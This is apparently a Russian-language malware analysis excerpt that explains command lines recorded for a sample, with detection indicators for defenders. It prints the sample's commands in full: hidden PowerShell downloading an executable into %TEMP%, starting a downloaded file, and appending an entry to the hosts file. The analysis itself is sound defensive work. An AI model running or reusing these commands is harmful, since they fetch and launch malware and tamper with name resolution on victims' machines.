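Техническая информация
Ниже перечислены командные строки и параметры окна, зафиксированные в отчёте. Символ # в адресе 17#.16.1.71, по-видимому, является маскировкой исходного отчёта: в строке с записью в файл hosts адрес с теми же остальными октетами указан как 172.16.1.71.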
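- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://17#.16.1.71/mal/malware12.exe', '%TEMP%\malware12.exe') &
  Пояснение: PowerShell запускается со скрытым окном (-w hidden) и по незашифрованному HTTP загружает исполняемый файл в %TEMP%. Для обнаружения показательны запуск powershell.exe из cmd.exe с вызовом WebClient.DownloadFile и появление нового .exe в %TEMP%.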
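- '<SYSTEM32>\cmd.exe' /c start %TEMP%\i03.png &
  Пояснение: открывается файл i03.png из %TEMP% — под этим именем сохраняется загружаемое изображение image04.png. Вероятно, картинка показывается пользователю для отвлечения внимания; в отчёте это не уточняется.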
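- '<SYSTEM32>\cmd.exe' /c echo 172.16.1.71 contrSys.hacklearning.com >> <DRIVERS>\etc\hosts
  Пояснение: в файл hosts дописывается запись, по которой имя contrSys.hacklearning.com разрешается в 172.16.1.71 в обход DNS. Адрес принадлежит частному диапазону 172.16.0.0/12, поэтому как индикатор он значим только в той сети, где выполнялся образец. Изменения файла hosts стоит отслеживать средствами контроля целостности.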
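- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://17#.16.1.71/mal/image04.png', '%TEMP%\i03.png') &
  Пояснение: та же схема загрузки через скрытый PowerShell; файл image04.png сохраняется в %TEMP% под другим именем — i03.png, поэтому имя на диске не совпадает с именем в URL.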
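- ClassName: 'Shell_TrayWnd' WindowName: ''
  Пояснение: Shell_TrayWnd — класс окна панели задач Windows; имя окна в записи пустое. Что именно образец делает с этим окном, из строки не видно — вероятно, это запись о поиске окна.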